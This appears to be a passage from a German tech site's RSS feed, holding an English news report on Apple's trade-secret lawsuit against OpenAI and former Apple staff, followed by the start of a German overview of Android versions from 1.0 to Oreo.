<guid isPermaLink="true">https://tsecurity.de/de/3661897/it-nachrichten/rotten-to-its-core-apple-files-an-explosive-lawsuit-against-openai/</guid>
<pubDate>Sat, 11 Jul 2026 15:17:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Apple surprised the tech industry after financial markets closed Friday with news the company has sued OpenAI, alleging theft of trade secrets for <a href="https://www.computerworld.com/article/4163748/openai-plans-its-own-iphone-killer.html">ChatGPT hardware</a>. <a href="https://daringfireball.net/misc/2026/06/Apple_Inc._v._Chang_Liu_et_al.pdf" data-type="link" data-id="https://daringfireball.net/misc/2026/06/Apple_Inc._v._Chang_Liu_et_al.pdf" target="_blank" rel="noreferrer noopener">The lawsuit</a> particularly targets some senior ex-Apple employees now working at OpenAI.</p>



<p>Apple’s suit names two former employees — Chang Liu and <a href="https://www.cnbctv18.com/technology/who-is-tang-tan-the-iphone-and-apple-watch-lead-designer-who-is-likely-to-leave-soon-18536121.htm" target="_blank" rel="noreferrer noopener">Tang Tan</a>, former vice president for product design, iPhone and Apple Watch — as well as OpenAI and that company’s recently-acquired firm, io Products, alleging “trade secret misappropriation and breach of contract.” </p>



<p>Jony Ive, who <a href="https://openai.com/sam-and-jony/" target="_blank" rel="noreferrer noopener">sold io Products to OpenAI</a>, is not named in the lawsuit, though it seems relevant that Tan was one of the senior ex-Apple executives who <a href="https://www.computerworld.com/article/3992592/jony-ive-and-openai-plan-bicycles-for-21st-century-minds.html">founded that company</a>.</p>



<p>For its part, OpenAI issued a brief statement in response to the litigation. “We have no interest in other companies’ trade secrets,” the company said. “We remain focused on building innovative technology that empowers people everywhere.”</p>



<h2 class="wp-block-heading"><strong>The allegations against Tan</strong></h2>



<p>Some of the claims and allegations included in Apple’s lawsuit include:</p>



<ul class="wp-block-list">
<li>That in the months before leaving Apple, Tan met with OpenAI or its collaborators and discussed meetings with a key Apple supplier.</li>



<li>He emailed himself information about suppliers and internal summaries.</li>



<li>When interviewing former Apple staffers for jobs, he used confidential information, such as internal project code names, to gain even more knowledge.</li>



<li>He asked candidates to bring actual parts from Apple to interviews to discuss — and a then-Apple employee screenshotted and downloaded files concerning a highly confidential Apple project before attending an OpenAI recruitment session.</li>



<li>Tan asked Apple employees to bring CAD/design artifacts to their interviews.</li>



<li>Tan allegedly instructed new hires on how to avoid scrutiny when leaving Apple, such as instructing them not to tell the company they had taken jobs at OpenAI.</li>
</ul>



<h2 class="wp-block-heading"><strong>The ‘so funny’ laptop bug</strong></h2>



<p>The lawsuit also claimed that after quitting Apple for OpenAI in January 2026, Chang Liu managed to keep or “otherwise acquire” an Apple-issued notebook which he used to access confidential data on the company’s private network while at OpenAI. “LOL, I found out I can access the [server], so funny,” Liu texted a friend still working at Apple. </p>



<p>The suit alleges that he made no effort to report the situation, which was a bug in the system he had uncovered. Apple eventually discovered the exfiltration was taking place and took steps to prevent it, but Liu allegedly downloaded more than 1,000 pages of data, including “confidential technical presentations, spreadsheets, PDFs, and written work product,” Apple said.</p>



<p>“Only OpenAI and Mr. Liu know all the ways they have been exploiting the trove of Apple confidential information he stole, and to the extent they have not concealed or destroyed the evidence of these misappropriations, it will be investigated thoroughly in discovery.” </p>



<p>Apple’s lawsuit also alleges Liu was simultaneously coaching a current Apple employee named Alyssa Peng on how to copy files from Apple workstations without triggering the security team, asking her to get specific confidential information and using Apple’s stolen data to help her get ready for an eventual OpenAI interview.</p>



<h2 class="wp-block-heading"><strong>Why this could get bigger</strong></h2>



<p>There’s much in the litigation that it will garner serious international attention as it unfolds. Apple’s argues that a competitor with access to so much of its own proprietary information could “bypass years of independent research and development, skip the capital expenditure required to build genuine expertise, and bring products to market faster and at lower cost, harming the value of Apple’s investments.”</p>



<p>It’s not just the secrets behind actively-used processes Apple is protecting; the company is also asserting its rights to regain control of information it has assembled over time concerning processes and manufacturing attempts that have failed. That’s understandable – you can invest a lot of money in finding out what doesn’t work and knowing that is a trade secret in itself. </p>



<p>“OpenAI coaches candidates to prepare for their interviews by studying Apple’s confidential engineering documentation, internal presentations, and proprietary technical materials,” the litigation claims. “OpenAI then uses its insider Apple information to ask detailed questions to extract more: about Apple’s proprietary tools, vendor management processes, engineering methodologies, manufacturing workflows, and supplier relationships, for example.</p>



<p>“OpenAI has turned to trade secret misappropriation to free-ride off Apple’s decades of innovation,” Apple said. “This is the tip of the iceberg.” </p>



<p>The lawsuit also confirms that Apple often designs and customizes the specialized machinery used in its suppliers’ factories, and that trade secrets concerning those efforts have been grabbed. The suit notes that OpenAI works with established Apple suppliers Foxconn, Luxshare, and Goertek on its own hardware.</p>



<p>If true, these allegations go right to the top of <a href="https://www.applemust.com/openai-discovers-it-takes-time-not-just-design-to-build-great-hardware/#google_vignette" target="_blank" rel="noreferrer noopener">OpenAI’s hardware development plans</a>. Tan is now OpenAI’s Chief Hardware Officer.</p>



<p>The lawsuit points out that OpenAI now employs more than 400 Apple engineers and executives (including the company’s former <a href="https://www.applemust.com/apples-vision-pro-vp-makes-move-to-openai/" target="_blank" rel="noreferrer noopener">Vision Pro Vice President</a>), suggesting its entire approach to hardware recruitment is based on extracting Apple’s proprietary knowledge from potential hires. </p>



<p>“Apple lacks visibility into what’s been happening behind closed doors at OpenAI, where such misconduct is normalized and exemplified by leadership,” the lawsuit argues. “This much is clear, however: at every level, from members of its Technical Staff to its Chief Hardware Officer, and in coordination with business partners, OpenAI has been stealing Apple’s trade secrets and confidential information. As a natural result, OpenAI’s nascent hardware business now rests on the shakiest of foundations, rotten to its core by its illegal reliance on misappropriated trade secrets.”</p>



<p><em>You can follow me on social media! Join me on</em><em> </em><em><a href="https://bsky.app/profile/jonnyevanssays.bsky.social">BlueSky</a>,</em><em> </em><em><a href="http://www.linkedin.com/in/jonnyevans">LinkedIn</a>,</em><em> </em><em><a href="https://social.vivaldi.net/@jonnyevans">Mastodon</a>,</em><em> </em><em>and subscribe to</em><em> </em><em><a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Alle Android-Versionen im Überblick]]></title>
<description><![CDATA[Die Android-Versionshistorie ist – zumindest bis ins Jahr 2018 – mit süßen Versuchungen gepflastert.
					Foto: Olezzo – shutterstock.com




Googles mobiles Betriebssystem Android blickt auf bescheidene Anfänge zurück und wurde über die Jahre immens weiterentwickelt – sowohl auf optischer als au...]]></description>
<link>https://tsecurity.de/de/3661174/it-security-nachrichten/alle-android-versionen-im-ueberblick/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661174/it-security-nachrichten/alle-android-versionen-im-ueberblick/</guid>
<pubDate>Sat, 11 Jul 2026 05:22:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Die Android-Versionshistorie ist - zumindest bis ins Jahr 2018 - mit süßen Versuchungen gepflastert." title="Die Android-Versionshistorie ist - zumindest bis ins Jahr 2018 - mit süßen Versuchungen gepflastert." src="https://images.computerwoche.de/bdb/3392474/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Die Android-Versionshistorie ist – zumindest bis ins Jahr 2018 – mit süßen Versuchungen gepflastert.</p></figcaption></figure><p class="imageCredit">
					Foto: Olezzo – shutterstock.com</p></div>




<p>Googles mobiles Betriebssystem <a href="https://www.computerwoche.de/article/2824401/die-besten-android-launcher.html" title="Android" target="_blank">Android</a> blickt auf bescheidene Anfänge zurück und wurde über die Jahre immens weiterentwickelt – sowohl auf optischer als auch konzeptioneller und funktioneller Ebene. Im Folgenden haben wir alle jemals erschienenen (relevanten) Android-Versionen im Zeitverlauf für Sie zusammengestellt – inklusive ihrer jeweiligen Highlights.</p>



<h2 class="wp-block-heading">Android 1.0/1.1</h2>



<p>Sein offizielles Debüt feierte <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> mit Version 1.0 im Jahr 2008 – damals noch ohne aparten Codenamen mit Backwerk-Bezug. In der Smartphone-Frühzeit waren die Dinge bei Android vor allem eines: simpel.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der Homescreen von Android 1.0 - und sein rudimentärer Webbrowser." title="Der Homescreen von Android 1.0 - und sein rudimentärer Webbrowser." src="https://images.computerwoche.de/bdb/3392475/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der Homescreen von Android 1.0 – und sein rudimentärer Webbrowser.</p></figcaption></figure><p class="imageCredit">
					Foto: T-Mobile</p></div>




<p>Dennoch konnte das Google-Betriebssystem bereits mit integrierten Apps aufwarten, etwa Gmail, Google Maps, Kalender oder Youtube. Ein krasser Gegensatz zum heute gängigen (und besser aktualisierbaren) Standalone-App-Modell. </p>



<h2 class="wp-block-heading">Android 1.5 Cupcake</h2>



<p>Mit dem Release von <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 1.5 begann Google, die Versionen seines Mobile OS nach teigigen Leckereien zu benennen. Eine Tradition, die über etliche Jahre Bestand haben sollte. Mit Cupcake hielten diverse Optimierungen der Benutzeroberfläche Einzug – unter anderem in Form der ersten virtuellen Bildschirmtastatur.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Bei Android Cupcake rückte Google Widgets in den Fokus." title="Bei Android Cupcake rückte Google Widgets in den Fokus." src="https://images.computerwoche.de/bdb/3392476/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Bei Android Cupcake rückte Google Widgets in den Fokus.</p></figcaption></figure><p class="imageCredit">
					Foto: Android Police</p></div>




<p>Vor allem führte Google mit Cupcake aber das Framework für Drittanbieter-App-Widgets ein, was sich schnell zu einem <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Alleinstellungsmerkmal entwickelte. Mit Android Version 1.5 war es außerdem erstmals möglich, auch Videoaufnahmen zu realisieren.</p>



<h2 class="wp-block-heading">Android 1.6 Donut</h2>



<p>Im Herbst 2009 erblickte <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> Version 1.6 – Codename Donut – das Licht der Welt. Diese Android-Version optimierte Googles mobiles Betriebssystem weiter, zum Beispiel mit Support für diverse verschiedene Bildschirmauflösungen und -formate. Ein besonders zukunftskritisches Feature für Android hielt mit der Unterstützung des Mobilfunkstandards <a href="https://de.wikipedia.org/wiki/Codemultiplexverfahren" title="CDMA" target="_blank" rel="noopener">CDMA</a> Einzug. Letzteres begünstigte die folgende explosionsartige Ausbreitung von <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Die Universal Search Box hatte mit Android Version 1.6 ihren ersten Auftritt." title="Die Universal Search Box hatte mit Android Version 1.6 ihren ersten Auftritt." src="https://images.computerwoche.de/bdb/3392477/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Die Universal Search Box hatte mit Android Version 1.6 ihren ersten Auftritt.</p></figcaption></figure><p class="imageCredit">
					Foto: Google</p></div>




<h2 class="wp-block-heading">Android 2.0/2.1 Eclair</h2>



<p>Nur sechs Wochen nach Donut ließ Google <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 2.0 mit dem Codenamen Eclair auf die Nutzer los – einige Monate später folgte das 2.1-Update. Das erste Smartphone, das diese Android-Version nutzte, war Motorolas Milestone. Das Smartphone wurde in den USA unter der Bezeichnung “<a href="https://www.pcworld.com/article/521008/droid_sales_and_the_android_explosion.html" title="Droid" target="_blank">Droid</a>” vermarktet und sollte den technikaffinen Gegenpol zu Apples <a href="https://www.computerwoche.de/k/iphone-apps,3459" target="_blank" class="idgGlossaryLink">iPhone</a> bilden – zumindest legte das die relativ aggressive Marketingkampagne in den USA nahe:</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p>Bei Apple dürfte jedoch vor allem <a href="https://www.computerworld.com/article/1515386/steve-jobs-called-for-holy-war-against-google.html" title="für Verstimmung gesorgt haben" target="_blank">für Verstimmung gesorgt haben</a>, dass mit Eclair auch die bis dahin iOS-exklusive “Pinch-to-Zoom”-Funktionalität in <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> eingeführt wurde. Die revolutionärsten Elemente dieser Android-Version waren jedoch sprachgesteuerte Turn-by-Turn-Navigation und Verkehrsinformationen in Echtzeit – bis dahin nicht realisierte Features in der Smartphone-Welt. Darüber hinaus hielten mit Eclair auch Live-Hintergrundbilder sowie die erste Speech-to-Text-Funktion Einzug. </p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Die erste Navigations- und Diktierfunktion in Android 2.0." title="Die erste Navigations- und Diktierfunktion in Android 2.0." src="https://images.computerwoche.de/bdb/3392478/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Die erste Navigations- und Diktierfunktion in Android 2.0.</p></figcaption></figure><p class="imageCredit">
					Foto: Google</p></div>




<h2 class="wp-block-heading">Android 2.2 Froyo</h2>



<p>Mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 2.2 widmete sich Google (vier Monate nach dem Release von Version 2.1) hauptsächlich Performance-Optimierungen unter der Haube. Android Froyo erweiterte jedoch die Benutzeroberfläche um einige praktische Funktionen – darunter das inzwischen zum Standard gewordene Dock am unteren Rand des Startbildschirms sowie die erste Version von Voice Actions. Letzteres erlaubte den Benutzern, einige grundlegende Funktionen wie Wegbeschreibungen oder Notizen abzurufen, indem sie ein Icon antippen und anschließend einen Sprachbefehl folgen lassen.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Froyo brachte Sprachsteuerung erstmals in ernsthafter Form auf Android-Telefone." title="Froyo brachte Sprachsteuerung erstmals in ernsthafter Form auf Android-Telefone." src="https://images.computerwoche.de/bdb/3392479/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Froyo brachte Sprachsteuerung erstmals in ernsthafter Form auf Android-Telefone.</p></figcaption></figure><p class="imageCredit">
					Foto: Google</p></div>




<p>Bemerkenswert ist <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> Version 2.2 vor allem auch deshalb, weil es den <a href="https://www.computerwoche.de/article/2823820/die-5-besten-chrome-alternativen.html" title="Android-Webbrowser" target="_blank">Android-Webbrowser</a> mit Flash-Unterstützung ausstattete. Das war nicht nur wichtig, weil Flash damals im Web allgegenwärtig war, sondern auch weil Apple sich standhaft weigerte, das <a href="https://www.computerwoche.de/k/iphone-apps,3459" target="_blank" class="idgGlossaryLink">iPhone</a> um Flash-Support zu erweitern. Das war eine ganze Zeit lang ein <a href="https://www.computerworld.com/article/1484597/flash-boom-bang-android-and-the-adobe-flash-clash.html" title="echter Vorteil für Android" target="_blank">echter Vorteil für Android</a> – bis sich die Flash-Dominanz schließlich in Luft auflöste.</p>



<h2 class="wp-block-heading">Android 2.3 Gingerbread</h2>



<p>Mit Gingerbread versuchte Google, <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> im Jahr 2010 erstmals eine echte, “visuelle Identität” zu verleihen. Die Farbe des Android-Maskottchens breitete sich mit Android Version 2.3 über die gesamte Benutzeroberfläche aus. Der erste Schritt hin zu einer eigenständigen Designsprache. </p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Mit Android Gingerbread nahm die Android-Designsprache ihren Anfang." title="Mit Android Gingerbread nahm die Android-Designsprache ihren Anfang." src="https://images.computerwoche.de/bdb/3392480/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Mit Android Gingerbread nahm die Android-Designsprache ihren Anfang.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android 3.0/3.1/3.2 Honeycomb</h2>



<p>Die <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Honeycomb-Ära markierte ab 2011 einen weiteren Umbruch: Android 3.0 war ein <a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablet</a>-exklusives Betriebssystem, das zum Marktstart des <a href="https://www.computerwoche.de/k/ipad,3456" target="_blank" class="idgGlossaryLink">iPad</a>-Konkurrenten <a href="https://de.wikipedia.org/wiki/Motorola_Xoom" title="Motorola Xoom" target="_blank" rel="noopener">Motorola Xoom</a> veröffentlicht wurde. Auch die Point-Updates 3.1 und 3.2 waren exklusiv auf die zu dieser Zeit stark gefragten <a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablets</a> ausgelegt. </p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Android Honeycomb sollte Tablets einen " title="Android Honeycomb sollte Tablets einen " src="https://images.computerwoche.de/bdb/3392481/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Android Honeycomb sollte Tablets einen “Weltraum-ähnlichen”, “holografischen” Look verleihen.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p>Zwar hatte das Konzept der <a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablet</a>-spezifischen Oberfläche schon nach kurzer Zeit wieder ausgedient – allerdings wurden mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 3.0 zahlreiche Ideen umgesetzt, die das heute bekannte Android definiert haben: Honeycomb war die erste Android-Version, die die Nutzer essenzielle Navigationsbefehle über virtuelle Bildschirmtasten erledigen ließ und führte das Konzept einer “Karten-basierten” UI ein. </p>



<h2 class="wp-block-heading">Android 4.0 Ice Cream Sandwich</h2>



<p>Während Honeycomb so etwas wie eine “Brückenversion” darstellte, bildete <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 4.0 – Codename Ice Cream Sandwich – den offiziellen Einstiegspunkt in die neue Android-Designwelt. Veröffentlicht wurde diese Version ebenfalls im Jahr 2011 – und verfeinerte in erster Linie die mit Honeycomb eingeführten, visuellen Konzepte. Zudem vereinheitlichte Google mit dieser Android-Version sein Betriebssystem für Mobiltelefone und <a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablets</a>.</p>



<p>Mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 4.0 wurde zudem die Steuerung über Wischbewegungen als integrale Methode etabliert, um sich zurechtzufinden – eine damals weltbewegende Neuerung. Darüber hinaus markierte Ice Cream Sandwich auch den Beginn der Umstellung des Android-Ökosystems auf ein standardisiertes Design-Framework, auch bekannt als “<a href="https://android-developers.googleblog.com/2012/01/holo-everywhere.html" title="Holo" target="_blank" rel="noopener">Holo</a>“.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Homescreen und App Switching in Android 4.0." title="Homescreen und App Switching in Android 4.0." src="https://images.computerwoche.de/bdb/3392482/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Homescreen und App Switching in Android 4.0.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android 4.1/4.2/4.3 Jelly Bean</h2>



<p>Die Jelly-Bean-Ära erstreckte sich über drei <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Versionen und die Jahre 2012 und 2013. Dabei wurde das frische Fundament von Ice Cream Sandwich mit Bedacht, aber zielstrebig weiter optimiert und ausgebaut. Ergebnis war ein Android-Betriebssystem, das mit neuem Schwung und Glanz zunehmend auch Mobile-Durchschnittsbenutzer begeistern konnte.</p>



<p>Abgesehen von der Optik brachte Jelly Bean auch einen ersten Vorgeschmack auf Google Now (das leider inzwischen zu einem zweitklassigen Newsfeed <a href="https://www.computerworld.com/article/1713354/google-feed.html" title="verkommen ist" target="_blank">verkommen ist</a>). Weitere Benefits, die mit <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> Jelly Bean Einzug hielten, waren unter anderem ein erweitertes (sprachbasiertes) Suchsystem und Multi-User-Support. Letzteres stand allerdings nur auf <a href="https://www.computerwoche.de/k/tablet-pc,3453" target="_blank" class="idgGlossaryLink">Tablet</a>-Geräten zur Verfügung. Davon abgesehen, gab auch das Quick Settings Panel in dieser Android-Version sein Debüt – genauso wie Widgets für den Sperrbildschirm.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Quick Settings und der (kurzlebige) Widget-befüllte Lockscreen in Android Jelly Bean." title="Quick Settings und der (kurzlebige) Widget-befüllte Lockscreen in Android Jelly Bean." src="https://images.computerwoche.de/bdb/3392483/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Quick Settings und der (kurzlebige) Widget-befüllte Lockscreen in Android Jelly Bean.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android 4.4 KitKat</h2>



<p>Mit Version 4.4 kam das Zeitalter der dunklen Farbgebung bei <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> zu einem Ende. KitKat brachte Ende 2013 frischere, hellere Farben für Googles Betriebssystem und sorgte damit für eine umfassende, optische Modernisierung. Premiere feierte mit Android 4.4 außerdem das allseits bekannte “OK, Google”-Freihand-Feature (das damals nur funktionierte, wenn der Startbildschirm oder die Google-App bereits geöffnet war).</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der Kitkat-Homescreen und das dedizierte Google-Now-Panel." title="Der Kitkat-Homescreen und das dedizierte Google-Now-Panel." src="https://images.computerwoche.de/bdb/3392484/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der Kitkat-Homescreen und das dedizierte Google-Now-Panel.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p>Die Nutzer von Google-eigenen (Nexus-)Smartphones durften sich zudem erstmals an einem Startbildschirm-Panel erfreuen, das exklusiv für Google-Dienste reserviert war.</p>



<h2 class="wp-block-heading">Android 5.0/5.1 Lollipop</h2>



<p>Mit Lollipop führte Google im Herbst 2014 den bis heute gültigen <a href="https://www.computerworld.com/article/1618144/material-design-1-year-later-pocket-pocketcasts.html" title="Material-Design-Standard" target="_blank">Material-Design-Standard</a> bei <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> ein, der sich nicht nur auf das Betriebssystem selbst, sondern auch auf Apps und andere Google-Produkte auswirkte. Das kartenbasierte User Interface, das bislang punktuell in Android eingesetzt wurde, wurde mit Android 5.0 zum zentralen Designaspekt.</p>



<p>Davon abgesehen, brachte <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> Lollipop auch einige neue Funktionen in die Android-Welt – unter anderem den weiterentwickelten “Ok, Google”-Befehl, Multi-User-Support für Mobiltelefone sowie ein optimiertes Benachrichtigungsmanagement. Leider flossen mit Lollipop auch <a href="https://www.computerworld.com/article/1617255/broken-lollipop-android-50.html" title="diverse Bugs" target="_blank">diverse Bugs</a> ein, die in weiten Teilen erst mit der <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Version 5.1 ab 2015 vollständig behoben werden konnten.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Mit Lollipop nahm Androids Material Design seinen Anfang." title="Mit Lollipop nahm Androids Material Design seinen Anfang." src="https://images.computerwoche.de/bdb/3392485/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Mit Lollipop nahm Androids Material Design seinen Anfang.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<h2 class="wp-block-heading">Android 6.0 Marshmallow</h2>



<p>Im Großen und Ganzen war Marshmallow – ebenfalls im Jahr 2015 veröffentlicht – eine eher unbedeutende <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Version, die mehr wie ein Point-Update wirkte. Allerdings setzte Marshmallow den Startpunkt dafür, dass Google jährlich eine große neue Android-Version veröffentlicht.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Android Marshmallow und " title="Android Marshmallow und " src="https://images.computerwoche.de/bdb/3392486/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Android Marshmallow und “Now on Tap” (RIP).</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p>Das auffälligste Marshmallow-Feature war die vielversprechende Bildschirmsuchfunktion “Now On Tap” – die leider nie weiterentwickelt und 2016 still und heimlich beerdigt wurde. <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> 6.0 enthielt jedoch auch einige subtilere Neuerungen, etwa granularere App-Berechtigungen sowie Support für Fingerabdruckscanner und USB-C.</p>



<h2 class="wp-block-heading">Android 7.0/7.1 Nougat</h2>



<p>Die <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Versionen mit dem Codenamen Nougat wurden 2016 veröffentlicht und ergänzten Googles Mobile OS um einen nativen Split-Screen-Modus, ein neues System, um Benachrichtigungen zu managen, und eine Data-Saver-Funktion. Darüber hinaus hatte Android 7.0 bis 7.1 auch einige kleinere, aber dennoch wichtige Features an Bord – beispielsweise einen <a href="https://www.computerworld.com/article/1713251/time-saving-android-shortcuts.html" title="Shortcut" target="_blank">Shortcut</a>, um zwischen Apps zu wechseln.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Der mit Nougat neu eingeführte, native Split-Screen-Modus." title="Der mit Nougat neu eingeführte, native Split-Screen-Modus." src="https://images.computerwoche.de/bdb/3392487/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Der mit Nougat neu eingeführte, native Split-Screen-Modus.</p></figcaption></figure><p class="imageCredit">
					Foto: JR Raphael | IDG</p></div>




<p>Die vielleicht wichtigste Neuerung von <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> Nougat war jedoch die Möglichkeit, den Google Assistant zu integrieren, der etwa zwei Monate nach dem Nougat-Debüt (zusammen mit Google <a href="https://www.computerworld.com/article/1667955/google-pixel-phone.html" title="erstem Pixel-Smartphone" target="_blank">erstem Pixel-Smartphone</a>) vorgestellt wurde. Der Assistant entwickelte sich in den kommenden Jahren zu einer wichtigen <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Komponente (und den meisten anderen Google-Produkten).</p>



<h2 class="wp-block-heading">Android 8.0/8.1 Oreo</h2>



<p>Mit Version 8.0 und 8.1 – veröffentlicht im Jahr 2017 unter dem Codenamen Oreo – erhielt <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> weitere Annehmlichkeiten. Unter anderem einen nativen Bild-in-Bild-Modus, eine Schlummerfunktion für Notifications sowie tiefgehendere Möglichkeiten, App-Benachrichtigungen zu kontrollieren. </p>



<p>Darüber hinaus war diese <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Version auch ein Versuch von Google, Android und Chrome OS <a href="https://www.computerworld.com/article/1711690/android-chrome-os-alignment.html" title="näher zusammenzubringen" target="_blank">näher zusammenzubringen</a> und die Nutzung von <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Apps auf Chromebooks zu optimieren. Davon abgesehen war Android 8 auch vom ehrgeizigen Bestreben geprägt, mit “<a href="https://www.computerworld.com/article/1680570/google-android-upgrades-project-treble.html" title="Project Treble" target="_blank">Project Treble</a>” eine modulare Basis für den <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Quellcode zu schaffen. Die Hoffnung: Es den Geräteherstellern einfacher zu machen, zeitnah Software-Updates bereitzustellen.</p>



